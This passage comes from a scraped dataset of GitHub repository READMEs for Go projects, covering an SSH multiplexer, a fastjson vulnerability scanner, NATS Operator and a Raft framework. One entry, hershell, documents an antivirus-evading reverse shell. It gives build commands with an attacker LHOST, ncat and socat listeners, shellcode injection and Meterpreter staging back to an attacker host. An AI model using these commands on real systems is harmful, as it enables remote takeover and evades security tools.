`SSHClientOptions` on [config.go](https://github.com/crosbymichael/slex/blob/master/config.go)\n\n### Get the uptime for all servers\n```bash\nslex --host 192.168.1.3 --host 192.168.1.4 uptime\n[192.168.1.3:22] 01:05:20 up 4:44, 0 users, load average: 0.35, 0.39, 0.33\n[192.168.1.4:22] 01:05:20 up 9:45, 0 users, load average: 0.04, 0.07, 0.06\n```\n\n### Run a docker container on all servers\n```bash\nslex --host 192.168.1.3 --host 192.168.1.4 docker run --rm busybox echo \"hi slex\"\n[192.168.1.3:22] hi slex\n[192.168.1.4:22] hi slex\n```\n\n### Pipe scripts to all servers\n```bash\necho \"echo hi again\" | slex --host 192.168.1.3 --host 192.168.1.4\n[192.168.1.3:22] hi again\n[192.168.1.4:22] hi again\n```\n\n#### License - MIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lesnuages/hershell", "link": "https://github.com/lesnuages/hershell", "tags": ["security", "exploit", "reverse-shell"], "stars": 554, "description": "Multiplatform reverse shell generator", "lang": "Go", "repo_lang": "", "readme": "# Hershell\n\nSimple TCP reverse shell written in [Go](https://golang.org).\n\nIt uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.\n\nSupported OS are:\n\n- Windows\n- Linux\n- Mac OS\n- FreeBSD and derivatives\n\n## Why ?\n\nAlthough meterpreter payloads are great, they are sometimes spotted by AV products.\n\nThe goal of this project is to get a simple reverse shell, which can work on multiple systems.\n\n## How ?\n\nSince it's written in Go, you can cross compile the source for the desired architecture.\n\n## Getting started & dependencies\n\nAs this is a Go project, you will need to follow the [official documentation](https://golang.org/doc/install) to set up\nyour Golang environment (with the `$GOPATH` environment variable).\n\nThen, just run `go get github.com/lesnuages/hershell` to fetch the project.\n\n### Building the payload\n\nTo simplify things, you can use the provided Makefile.\nYou can set the following environment variables:\n\n- ``GOOS`` : the target OS\n- ``GOARCH`` : the target architecture\n- ``LHOST`` : the attacker IP or domain name\n- ``LPORT`` : the listener port\n\nFor the ``GOOS`` and ``GOARCH`` variables, you can get the allowed values [here](https://golang.org/doc/install/source#environment).\n\nHowever, some helper targets are available in the ``Makefile``:\n\n- ``depends`` : generate the server certificate (required for the reverse shell)\n- ``windows32`` : builds a windows 32 bits executable (PE 32 bits)\n- ``windows64`` : builds a windows 64 bits executable (PE 64 bits)\n- ``linux32`` : builds a linux 32 bits executable (ELF 32 bits)\n- ``linux64`` : builds a linux 64 bits executable (ELF 64 bits)\n- ``macos32`` : builds a mac os 32 bits executable (Mach-O)\n- ``macos64`` : builds a mac os 64 bits executable (Mach-O)\n\nFor those targets, you just need to set the ``LHOST`` and ``LPORT`` environment variables.\n\n### Using the shell\n\nOnce executed, you will be provided with a remote shell.\nThis custom interactive shell will allow you to execute system commands through `cmd.exe` on Windows, or `/bin/sh` on UNIX machines.\n\nThe following special commands are supported:\n\n* ``run_shell`` : drops you an system shell (allowing you, for example, to change directories)\n* ``inject `` : injects a shellcode (base64 encoded) in the same process memory, and executes it\n* ``meterpreter [tcp|http|https] IP:PORT`` : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)\n* ``exit`` : exit gracefully\n\n## Usage\n\nFirst of all, you will need to generate a valid certificate:\n```bash\n$ make depends\nopenssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem\nGenerating a 4096 bit RSA private key\n....................................................................................++\n.....++\nwriting new private key to 'server.key'\n-----\ncat server.key >> server.pem\n```\n\nFor windows:\n\n```bash\n# Predifined 32 bit target\n$ make windows32 LHOST=192.168.0.12 LPORT=1234\n# Predifined 64 bit target\n$ make windows64 LHOST=192.168.0.12 LPORT=1234\n```\n\nFor Linux:\n```bash\n# Predifined 32 bit target\n$ make linux32 LHOST=192.168.0.12 LPORT=1234\n# Predifined 64 bit target\n$ make linux64 LHOST=192.168.0.12 LPORT=1234\n```\n\nFor Mac OS X\n```bash\n$ make macos LHOST=192.168.0.12 LPORT=1234\n```\n\n## Examples\n\n### Basic usage\n\nOne can use various tools to handle incomming connections, such as:\n\n* socat\n* ncat\n* openssl server module\n* metasploit multi handler (with a `python/shell_reverse_tcp_ssl` payload)\n\nHere is an example with `ncat`:\n\n```bash\n$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234\nNcat: Version 7.60 ( https://nmap.org/ncat )\nNcat: Listening on :::1234\nNcat: Listening on 0.0.0.0:1234\nNcat: Connection from 172.16.122.105.\nNcat: Connection from 172.16.122.105:47814.\n[hershell]> whoami\ndesktop-3pvv31a\\lab\n```\n\nHere is an example with `socat` (tested with version `1.7.3.2`):\n```bash\n$ socat `tty` OPENSSL-LISTEN:1234,reuseaddr,cert=server.pem,key=server.key,verify=0\n# connection would be initiated here\n[hershell]> whoami\ndesktop-3pvv31a\\lab\n```\n\n### Meterpreter staging\n\n**WARNING**: this currently only work for the Windows platform.\n\nThe meterpreter staging currently supports the following payloads :\n\n* `windows/meterpreter/reverse_tcp`\n* `windows/x64/meterpreter/reverse_tcp`\n* `windows/meterpreter/reverse_http`\n* `windows/x64/meterpreter/reverse_http`\n* `windows/meterpreter/reverse_https`\n* `windows/x64/meterpreter/reverse_https`\n\nTo use the correct one, just specify the transport you want to use (tcp, http, https)\n\nTo use the meterpreter staging feature, just start your handler:\n\n```bash\n[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler\n[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https\npayload => windows/x64/meterpreter/reverse_https\n[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105\nlhost => 172.16.122.105\n[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443\nlport => 8443\n[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem\nHandlerSSLCert => ./server.pem\n[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j\n[*] Exploit running as background job 0.\n\n[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443\n[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >\n```\n\nThen, in `hershell`, use the `meterpreter` command:\n\n```bash\n[hershell]> meterpreter https 172.16.122.105:8443\n```\n\nA new meterpreter session should pop in `msfconsole`:\n\n```bash\n[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >\n[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...\n[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100\n\n[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions\n\nActive sessions\n===============\n\n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x64/windows DESKTOP-3PVV31A\\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)\n\n[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1\n[*] Starting interaction with 1...\n\nmeterpreter > getuid\nServer username: DESKTOP-3PVV31A\\lab\n```\n\n## Credits\n\n[@khast3x](https://github.com/khast3x) for the Dockerfile feature\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "a1phaboy/FastjsonScan", "link": "https://github.com/a1phaboy/FastjsonScan", "tags": ["deserialization-vulnerability", "fastjson", "fastjson-rce", "scanner-web"], "stars": 554, "description": "Fastjson\u626b\u63cf\u5668\uff0c\u53ef\u8bc6\u522b\u7248\u672c\u3001\u4f9d\u8d56\u5e93\u3001autoType\u72b6\u6001\u7b49\u3002A tool to distinguish fastjson ,version and dependency", "lang": "Go", "repo_lang": "", "readme": "![FastjsonScan](https://socialify.git.ci/a1phaboy/FastjsonScan/image?font=Source%20Code%20Pro&forks=1&issues=1&language=1&name=1&owner=1&pattern=Circuit%20Board&stargazers=1&theme=Light)\n# FastjsonScan\nA tool to fast detect fastjson's deserialize vuln\n\n## 0x00 FastjsonScan now is public \ud83c\udf89\ud83c\udf89\ud83c\udf89\n\n\n### WHAT?\nFastjsonExpFramework is divided into multiple modules such as detection, utilization, confusion, and bypass JDK, and FastjsonScan is a part of it. It realizes multi-faceted positioning of fastjson versions by detecting errors, requests, and dependent libraries.\n\n### WHY?\nThe existing fastjson scanners cannot meet the fastjson version with such a fast iteration speed. Most of the scanners have long been unmaintained and are not suitable for higher versions. I will continue to optimize this series of projects.\n\n### HOW?\nCurrently fastjsonScan supports\n\u2611\ufe0fSupport batch interface detection\n\u2611\ufe0f Interval detection of 1.2.83 and below (mainly divided into three security versions 48, 68, and 80)\n\u2611\ufe0fSupport error reporting and echo detection\n\u2611\ufe0fDNS out network detection\n\u2611\ufe0fSupport AutoType status detection\n\u2611\ufe0f Dependency library detection\n\u2611\ufe0f Latency detection\n\n###TODO\nAdapt to the detection in the intranet environment\nAdapt webpack for automatic scanning\nImprove the detection of DNS echo detection dependent library\nImprove the detection method that is above version 61 and does not go online\nImprove the detection of other different json parsing libraries\nImprove related dependency library detection\n\n### If you have any questions during use, please submit issues\ud83d\udc4f\n\n### Demo\n![img.png](img.png)![img_1.png](img_1.png)\n\n## Usage\n**FastjsonScan [-u] url [-f] urls.txt [-o] result.txt**\n-u target url, note that http/https needs to be added\n-f target url file, can scan multiple urls\n-o result save file, the default results.txt file in the current folder\n\n## 0x01 Dev Notes\n\n### 2022-09-05 0.5\nFramework separates the scan module\n\n### 2022-09-05 0.4 beta\n\u2611\ufe0fRefactor the version detection module, and separate the judgment fastjson, jackson, org.json, gson as the recognition module\n\nTODO:\nUse dnslog to detect dependent libraries\nWrite using modules\n\n### 2022-09-04 0.35 beta\n\u2611\ufe0fFixed the detection payload of version 48. After detecting the payload of version 80, the payload will trigger tojavaobject to add the java.net.InetAddress class to the whitelist. When the second version detection is performed, false positives will occur\n\u2611\ufe0fVersion detection will give priority to judging whether AutoType is enabled, if it is enabled, it can only vaguely distinguish between 48 and above\n\n\n### 2022-09-03 0.34 beta\n\u2611\ufe0fRefactored version detection module, divided into 3 parts (48, 68, 80) from the previous precise detection\n\u2611\ufe0fRewrote the logic of judging version\n\u2611\ufe0fAdded the detection of version 80 and version 83\n\nTODO:\nDetection of target dependent library environment\nThe status of AutoType has an impact on version detection and needs to be dealt with\n\n\n### 2022-09-02 0.33 beta\n\u2611\ufe0fModified the error detection logic containing the jackson field\n\u2611\ufe0fDNS detection adds a 10-second waiting time to prevent false positives caused by network reasons\n\n### 2022-09-01 0.32 beta\n\u2611\ufe0f Add multiple gadgets, some gadgets are unsuccessful to reproduce, add according to the target environment\n\u2611\ufe0fModified the bug of delay detection\n\u2611\ufe0f Added URLReader detection chain\n\n### 2022-08-07 0.31 beta\n\u2611\ufe0f Added several gadgets\n\n### 2022-08-06 0.3 beta\n\u2611\ufe0f Completed the AutoType detection module\n\n### 2022-08-05 0.2 beta\n\u2611\ufe0fCompleted the main part of the detection module: including error detection, DNS detection and delay detection\n\n\n\n## 0x02 Reference\nhttps://github.com/safe6Sec/Fastjson\nhttps://github.com/hosch3n/FastjsonVulns\nhttps://github.com/iSafeBlue/fastjson-autotype-bypass-demo\n\n## 0x03 Acknowledgments\nMany thanks to [blue](https://github.com/iSafeBlue) for his wonderful sharing on kcon\nThanks a lot [hosch3n](https://github.com/hosch3n) Answers from Master Li", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nats-io/nats-operator", "link": "https://github.com/nats-io/nats-operator", "tags": ["nats", "kubernetes", "operator", "cluster", "message-queue", "pubsub"], "stars": 553, "description": "NATS Operator", "lang": "Go", "repo_lang": "", "readme": "# NATS Operator\n\n> :warning: The recommended way of running NATS on Kubernetes is by using the [Helm charts](https://github.com/nats-io/k8s/tree/master/helm/charts/nats). If looking for [JetStream](https://github.com/nats-io/jetstream) support, this is supported in the [Helm charts](https://github.com/nats-io/k8s/tree/master/helm/charts/nats#jetstream). The NATS Operator is not recommended to be used for new deployments.\n\n[![License Apache 2.0](https://img.shields.io/badge/License-Apache2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n[![Build Status](https://travis-ci.org/nats-io/nats-operator.svg?branch=master)](https://travis-ci.org/nats-io/nats-operator)\n[![Version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=go&type=5&v=0.8.2)](https://github.com/nats-io/nats-operator/releases/tag/v0.8.2)\n\nNATS Operator manages NATS clusters atop [Kubernetes][k8s-home] using [CRDs](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/). If looking to run NATS on K8S without the operator you can also find [Helm charts in the nats-io/k8s repo](https://github.com/nats-io/k8s#helm-charts-for-nats). You can also find more info about running NATS on Kubernetes in the [docs](https://docs.nats.io/nats-on-kubernetes/nats-kubernetes) as well as a minimal setup using `StatefulSets` only without using the operator to get started [here](https://docs.nats.io/nats-on-kubernetes/minimal-setup).\n\n[k8s-home]: http://kubernetes.io\n\n## Requirements\n\n- Kubernetes v1.10+.\n - [Configuration reloading](#configuration-reload) is only supported in Kubernetes v1.12+.\n - [Authentication using service accounts](#auth-service-accounts) is only supported in Kubernetes v1.12+ having the `TokenRequest` API enabled.\n\n## Introduction\n\nNATS Operator provides a `NatsCluster` [Custom Resources Definition](https://kubernetes.io/docs/tasks/access-kubernetes-api/extend-api-custom-resource-definitions/) (CRD) that models a NATS cluster.\nThis CRD allows for specifying the desired size and version for a NATS cluster, as well as several other advanced options:\n\n```yaml\napiVersion: nats.io/v1alpha2\nkind: NatsCluster\nmetadata:\n name: example-nats-cluster\nspec:\n size: 3\n version: \"2.1.8\"\n```\n\nNATS Operator monitors creation/modification/deletion of `NatsCluster` resources and reacts by attempting to perform the any necessary operations on the associated NATS clusters in order to align their current status with the desired one.\n\n## Installing\n\nNATS Operator supports two different operation modes:\n\n* **Namespace-scoped (classic):** NATS Operator manages `NatsCluster` resources on the Kubernetes namespace where it is deployed.\n* **Cluster-scoped (experimental):** NATS Operator manages `NatsCluster` resources across all namespaces in the Kubernetes cluster.\n\nThe operation mode must be chosen when installing NATS Operator and cannot be changed later.\n\n### Namespace-scoped installation\n\nTo perform a namespace-scoped installation of NATS Operator in the Kubernetes cluster pointed at by the current context, you may run:\n\n```console\n$ kubectl apply -f https://github.com/nats-io/nats-operator/releases/latest/download/00-prereqs.yaml\n$ kubectl apply -f https://github.com/nats-io/nats-operator/releases/latest/download/10-deployment.yaml\n``` \n\nThis will, by default, install NATS Operator in the `default` namespace and observe `NatsCluster` resources created in the `default` namespace, alone.\nIn order to install in a different namespace, you must first create said namespace and edit the manifests above in order to specify its name wherever necessary.\n\n**WARNING:** To perform multiple namespace-scoped installations of NATS Operator, you must manually edit the `nats-operator-binding` cluster role binding in `deploy/00-prereqs.yaml` file in order to add all the required service accounts.\nFailing to do so may cause all NATS Operator instances to malfunction.\n\n**WARNING:** When performing a namespace-scoped installation of NATS Operator, you must make sure that all other namespace-scoped installations that may exist in the Kubernetes cluster share the same version.\nInstalling different versions of NATS Operator in the same Kubernetes cluster may cause unexpected behavior as the schema of the CRDs which NATS Operator registers may change between versions.\n\nAlternatively, you may use [Helm](https://www.helm.sh/) to perform a namespace-scoped installation of NATS Operator.\nTo do so you may go to [helm/nats-operator](https://github.com/nats-io/nats-operator/tree/master/helm/nats-operator) and use the Helm charts found in that repo.\n\n\n### Cluster-scoped installation (experimental)\n\nCluster-scoped installations of NATS Operator must live in the `nats-io` namespace.\nThis namespace must be created beforehand:\n\n```console\n$ kubectl create ns nats-io\n```\n\nThen, you must manually edit the manifests in `deployment/` in order to reference the `nats-io` namespace and to enable the `ClusterScoped` feature gate in the NATS Operator deployment.\n\n```yaml\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: nats-operator\n namespace: nats-io\nspec:\n (...)\n spec:\n containers:\n - name: nats-operator\n (...)\n args:\n - nats-operator\n - --feature-gates=ClusterScoped=true\n (...)\n```\n\nOnce you have done this, you may install NATS Operator by running:\n\n```console\n$ kubectl apply -f https://github.com/nats-io/nats-operator/releases/latest/download/00-prereqs.yaml\n$ kubectl apply -f https://github.com/nats-io/nats-operator/releases/latest/download/10-deployment.yaml\n``` \n\n**WARNING:** When performing a cluster-scoped installation of NATS Operator, you must make sure that there are no other deployments of NATS Operator in the Kubernetes cluster.\nIf you have a previous installation of NATS Operator, you must uninstall it before performing a cluster-scoped installation of NATS Operator. \n\n## Creating a NATS cluster\n\nOnce NATS Operator has been installed, you will be able to confirm that two new CRDs have been registered in the cluster:\n\n```console\n$ kubectl get crd\nNAME CREATED AT\nnatsclusters.nats.io 2019-01-11T17:16:36Z\nnatsserviceroles.nats.io 2019-01-11T17:16:40Z\n```\n\nTo create a NATS cluster, you must create a `NatsCluster` resource representing the desired status of the cluster.\nFor example, to create a 3-node NATS cluster you may run:\n\n```console\n$ cat <\n#### Using ServiceAccounts\n\n> :warning: The ServiceAccounts uses a very rudimentary approach of config reloading and watching CRDs and advanced K8S APIs that may not be available in your cluster. Instead, the decentralized JWT approach should be preferred, to learn more: https://docs.nats.io/developing-with-nats/tutorials/jwt\n\nThe NATS Operator can define permissions based on Roles by using any present ServiceAccount in a namespace.\nThis feature requires a Kubernetes v1.12+ cluster having the `TokenRequest` API enabled.\nTo try this feature using `minikube` v0.30.0+, you can configure it to start as follows:\n\n```console\n$ minikube start \\\n --extra-config=apiserver.service-account-signing-key-file=/var/lib/minikube/certs/sa.key \\\n --extra-config=apiserver.service-account-key-file=/var/lib/minikube/certs/sa.pub \\\n --extra-config=apiserver.service-account-issuer=api \\\n --extra-config=apiserver.service-account-api-audiences=api,spire-server \\\n --extra-config=apiserver.authorization-mode=Node,RBAC \\\n --extra-config=kubelet.authentication-token-webhook=true\n```\n\nPlease note that availability of this feature across Kubernetes offerings may vary widely.\n\nServiceAccounts integration can then be enabled by setting the\n`enableServiceAccounts` flag to true in the `NatsCluster` configuration.\n\n```yaml\napiVersion: nats.io/v1alpha2\nkind: NatsCluster\nmetadata:\n name: example-nats\nspec:\n size: 3\n version: \"1.3.0\"\n\n pod:\n # NOTE: Only supported in Kubernetes v1.12+.\n enableConfigReload: true\n auth:\n # NOTE: Only supported in Kubernetes v1.12+ clusters having the \"TokenRequest\" API enabled.\n enableServiceAccounts: true\n```\n\nPermissions for a `ServiceAccount` can be set by creating a\n`NatsServiceRole` for that account. In the example below, there are\ntwo accounts, one is an admin user that has more permissions.\n\n```yaml\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: nats-admin-user\n---\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: nats-user\n---\napiVersion: nats.io/v1alpha2\nkind: NatsServiceRole\nmetadata:\n name: nats-user\n namespace: nats-io\n\n # Specifies which NATS cluster will be mapping this account.\n labels:\n nats_cluster: example-nats\nspec:\n permissions:\n publish: [\"foo.*\", \"foo.bar.quux\"]\n subscribe: [\"foo.bar\"]\n---\napiVersion: nats.io/v1alpha2\nkind: NatsServiceRole\nmetadata:\n name: nats-admin-user\n namespace: nats-io\n labels:\n nats_cluster: example-nats\nspec:\n permissions:\n publish: [\">\"]\n subscribe: [\">\"]\n```\n\nThe above will create two different Secrets which can then be mounted as volumes\nfor a Pod.\n\n```sh\n$ kubectl -n nats-io get secrets\nNAME TYPE DATA AGE\n...\nnats-admin-user-example-nats-bound-token Opaque 1 43m\nnats-user-example-nats-bound-token Opaque 1 43m\n```\n\nPlease note that `NatsServiceRole` must be created in the same namespace as \n`NatsCluster` is running, but `bound-token` will be created for `ServiceAccount` \nresources that can be placed in various namespaces.\n\nAn example of mounting the secret in a `Pod` can be found below:\n\n```yaml\napiVersion: v1\nkind: Pod\nmetadata:\n name: nats-user-pod\n labels:\n nats_cluster: example-nats\nspec:\n volumes:\n - name: \"token\"\n projected:\n sources:\n - secret:\n name: \"nats-user-example-nats-bound-token\"\n items:\n - key: token\n path: \"token\"\n restartPolicy: Never\n containers:\n - name: nats-ops\n command: [\"/bin/sh\"]\n image: \"wallyqs/nats-ops:latest\"\n tty: true\n stdin: true\n stdinOnce: true\n volumeMounts:\n - name: \"token\"\n mountPath: \"/var/run/secrets/nats.io\"\n```\n\nThen within the `Pod` the token can be used to authenticate against\nthe server using the created token.\n\n```sh\n$ kubectl -n nats-io attach -it nats-user-pod\n\n/go # nats-sub -s nats://nats-user:`cat /var/run/secrets/nats.io/token`@example-nats:4222 hello.world\nListening on [hello.world]\n^C\n/go # nats-sub -s nats://nats-admin-user:`cat /var/run/secrets/nats.io/token`@example-nats:4222 hello.world\nCan't connect: nats: authorization violation\n```\n\n#### Using a single secret with the explicit configuration.\n\nAuthorization can also be set for the server by using a secret\nwhere the permissions are defined in JSON:\n\n```json\n{\n \"users\": [\n { \"username\": \"user1\", \"password\": \"secret1\" },\n { \"username\": \"user2\", \"password\": \"secret2\",\n \"permissions\": {\n\t\"publish\": [\"hello.*\"],\n\t\"subscribe\": [\"hello.world\"]\n }\n }\n ],\n \"default_permissions\": {\n \"publish\": [\"SANDBOX.*\"],\n \"subscribe\": [\"PUBLIC.>\"]\n }\n}\n```\n\nExample of creating a secret to set the permissions:\n\n```sh\nkubectl create secret generic nats-clients-auth --from-file=clients-auth.json\n```\n\nNow when creating a NATS cluster it is possible to set the permissions as\nin the following example:\n\n```yaml\napiVersion: \"nats.io/v1alpha2\"\nkind: \"NatsCluster\"\npmetadata:\n name: \"example-nats-auth\"\nspec:\n size: 3\n version: \"1.1.0\"\n\n auth:\n # Definition in JSON of the users permissions\n clientsAuthSecret: \"nats-clients-auth\"\n\n # How long to wait for authentication\n clientsAuthTimeout: 5\n```\n\n\n### Configuration Reload\n\nOn Kubernetes v1.12+ clusters it is possible to enable on-the-fly reloading of configuration for the servers that are part of the cluster.\nThis can also be combined with the authorization support, so in case the user permissions change, then the servers will reload and apply the new permissions.\n\n```yaml\napiVersion: \"nats.io/v1alpha2\"\nkind: \"NatsCluster\"\nmetadata:\n name: \"example-nats-auth\"\nspec:\n size: 3\n version: \"1.1.0\"\n\n pod:\n # Enable on-the-fly NATS Server config reload\n # NOTE: Only supported in Kubernetes v1.12+.\n enableConfigReload: true\n\n # Possible to customize version of reloader image\n reloaderImage: connecteverything/nats-server-config-reloader\n reloaderImageTag: \"0.2.2-v1alpha2\"\n reloaderImagePullPolicy: \"IfNotPresent\"\n auth:\n # Definition in JSON of the users permissions\n clientsAuthSecret: \"nats-clients-auth\"\n\n # How long to wait for authentication\n clientsAuthTimeout: 5\n```\n\n## Connecting operated NATS clusters to external NATS clusters\n\nBy using the `extraRoutes` field on the spec you can make the operated\nNATS cluster create routes against clusters outside of Kubernetes:\n\n```yaml\napiVersion: \"nats.io/v1alpha2\"\nkind: \"NatsCluster\"\nmetadata:\n name: \"nats\"\nspec:\n size: 3\n version: \"1.4.1\"\n\n extraRoutes:\n - route: \"nats://nats-a.example.com:6222\"\n - route: \"nats://nats-b.example.com:6222\"\n - route: \"nats://nats-c.example.com:6222\"\n```\n\nIt is also possible to connect to another operated NATS cluster as follows:\n\n```yaml\napiVersion: \"nats.io/v1alpha2\"\nkind: \"NatsCluster\"\nmetadata:\n name: \"nats-v2-2\"\nspec:\n size: 3\n version: \"1.4.1\"\n\n extraRoutes:\n - cluster: \"nats-v2-1\"\n```\n\n## Resolvers\n\nThe operator only supports the `URL()` resolver, see [example/example-super-cluster.yaml](example/example-super-cluster.yaml#L56-L59)\n\n## Development\n\n### Building the Docker Image\n\nTo build the `nats-operator` Docker image:\n\n```sh\n$ docker build -f docker/operator/Dockerfile . -t \n```\n\nTo build the `nats-server-config-reloader`:\n\n```sh\n$ docker build -f docker/reloader/Dockerfile . -t \n```\n\nYou'll need Docker `17.06.0-ce` or higher.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tidwall/uhaha", "link": "https://github.com/tidwall/uhaha", "tags": ["raft", "high-availability", "framework", "fault-tolerant"], "stars": 553, "description": "High Availability Raft Framework for Go", "lang": "Go", "repo_lang": "", "readme": "

\n\t\"uhaha\"\n

\n

\n\"GoDoc\"\n

\n\n

High Availabilty Framework for Happy Data

\n\nUhaha is a framework for building highly available Raft-based data applications in Go. \nThis is basically an upgrade to the [Finn](https://github.com/tidwall/finn) project, but has an updated API, better security features (TLS and auth passwords), \ncustomizable services, deterministic time, recalculable random numbers, simpler snapshots, a smaller network footprint, and more.\nUnder the hood it utilizes [hashicorp/raft](https://github.com/hashicorp/raft), [tidwall/redcon](https://github.com/tidwall/redcon), and [syndtr/goleveldb](https://github.com/syndtr/goleveldb).\n\n## Features\n\n- Simple API for quickly creating a custom Raft-based application.\n- Deterministic monotonic time that does not drift and stays in sync with the internet.\n- APIs for building custom services such as HTTP and gRPC.\n Supports the Redis protocol by default, so most Redis client library will work with Uhaha.\n- [TLS](#tls) and [Auth password](#auth-password) support.\n- Multiple examples to help jumpstart integration, including\n a [Key-value DB](https://github.com/tidwall/uhaha/tree/master/examples/kvdb), \n a [Timeseries DB](https://github.com/tidwall/uhaha/tree/master/examples/timeseries), \n and a [Ticket Service](https://github.com/tidwall/uhaha/tree/master/examples/ticket).\n\n## Example\n\nBelow a simple example of a service for monotonically increasing tickets. \n\n```go\npackage main\n\nimport \"github.com/tidwall/uhaha\"\n\ntype data struct {\n\tTicket int64\n}\n\nfunc main() {\n\t// Set up a uhaha configuration\n\tvar conf uhaha.Config\n\t\n\t// Give the application a name. All servers in the cluster should use the\n\t// same name.\n\tconf.Name = \"ticket\"\n\t\n\t// Set the initial data. This is state of the data when first server in the \n\t// cluster starts for the first time ever.\n\tconf.InitialData = new(data)\n\n\t// Since we are not holding onto much data we can used the built-in JSON\n\t// snapshot system. You just need to make sure all the important fields in\n\t// the data are exportable (capitalized) to JSON. In this case there is\n\t// only the one field \"Ticket\".\n\tconf.UseJSONSnapshots = true\n\t\n\t// Add a command that will change the value of a Ticket. \n\tconf.AddWriteCommand(\"ticket\", cmdTICKET)\n\n\t// Finally, hand off all processing to uhaha.\n\tuhaha.Main(conf)\n}\n\n// TICKET\n// help: returns a new ticket that has a value that is at least one greater\n// than the previous TICKET call.\nfunc cmdTICKET(m uhaha.Machine, args []string) (interface{}, error) {\n\t// The the current data from the machine\n\tdata := m.Data().(*data)\n\n\t// Increment the ticket\n\tdata.Ticket++\n\n\t// Return the new ticket to caller\n\treturn data.Ticket, nil\n}\n```\n\n### Building\n\nUsing the source file from the examples directory, we'll build an application\nnamed \"ticket\"\n\n```\ngo build -o ticket examples/ticket/main.go\n```\n\n### Running\n\nIt's ideal to have three, five, or seven nodes in your cluster.\n\nLet's create the first node.\n\n```\n./ticket -n 1 -a :11001\n```\n\nThis will create a node named 1 and bind the address to :11001\n\nNow let's create two more nodes and add them to the cluster.\n\n```\n./ticket -n 2 -a :11002 -j :11001\n./ticket -n 3 -a :11003 -j :11001\n```\n\nNow we have a fault-tolerant three node cluster up and running.\n\n### Using\n\nYou can use any Redis compatible client, such as the redis-cli, telnet, \nor netcat.\n\nI'll use the redis-cli in the example below.\n\nConnect to the leader. This will probably be the first node you created.\n\n```\nredis-cli -p 11001\n```\n\nSend the server a TICKET command and receive the first ticket.\n\n```\n> TICKET\n\"1\"\n```\n\nFrom here on every TICKET command will guarentee to generate a value larger\nthan the previous TICKET command.\n\n```\n> TICKET\n\"2\"\n> TICKET\n\"3\"\n> TICKET\n\"4\"\n> TICKET\n\"5\"\n```\n\n\n## Built-in Commands\n\nThere are a number built-in commands for managing and monitor the cluster.\n\n```sh\nVERSION # show the application version\nMACHINE # show information about the state machine\nRAFT LEADER # show the address of the current raft leader\nRAFT INFO [pattern] # show information about the raft server and cluster\nRAFT SERVER LIST # show all servers in cluster\nRAFT SERVER ADD id address # add a server to cluster\nRAFT SERVER REMOVE id # remove a server from the cluster\nRAFT SNAPSHOT NOW # make a snapshot of the data\nRAFT SNAPSHOT LIST # show a list of all snapshots on server\nRAFT SNAPSHOT FILE id # show the file path of a snapshot on server\nRAFT SNAPSHOT READ id [RANGE start end] # download all or part of a snapshot\n```\n\nAnd also some client commands.\n\n```sh\nQUIT # close the client connection\nPING # ping the server\nECHO [message] # echo a message to the server\nAUTH password # authenticate with a password\n```\n\n## Network and security considerations (TLS and Auth password)\n\nBy default a single Uhaha instance is bound to the local `127.0.0.1` IP address. Thus nothing outside that machine, including other servers in the cluster or machines on the same local network will be able communicate with this instance. \n\n### Network security\n\nTo open up the service you will need to provide an IP address that can be reached from the outside.\nFor example, let's say you want to set up three servers on a local `10.0.0.0` network.\n\nOn server 1:\n\n```sh\n./ticket -n 1 -a 10.0.0.1:11001\n```\n\nOn server 2:\n\n```sh\n./ticket -n 2 -a 10.0.0.2:11001 -j 10.0.0.1:11001\n```\n\nOn server 3:\n\n```sh\n./ticket -n 3 -a 10.0.0.3:11001 -j 10.0.0.1:11001\n```\n\nNow you have a Raft cluster running on three distinct servers in the same local network. This may be enough for applications that only require a [network security policy](https://en.wikipedia.org/wiki/Network_security). Basically any server on the local network can access the cluster.\n\n### Auth password\n\nIf you want to lock down the cluster further you can provide a secret auth, which is more or less a password that the cluster and client will need to communicate with each other.\n\n```sh\n./ticket -n 1 -a 10.0.0.1:11001 --auth my-secret\n```\n\nAll the servers will need to be started with the same 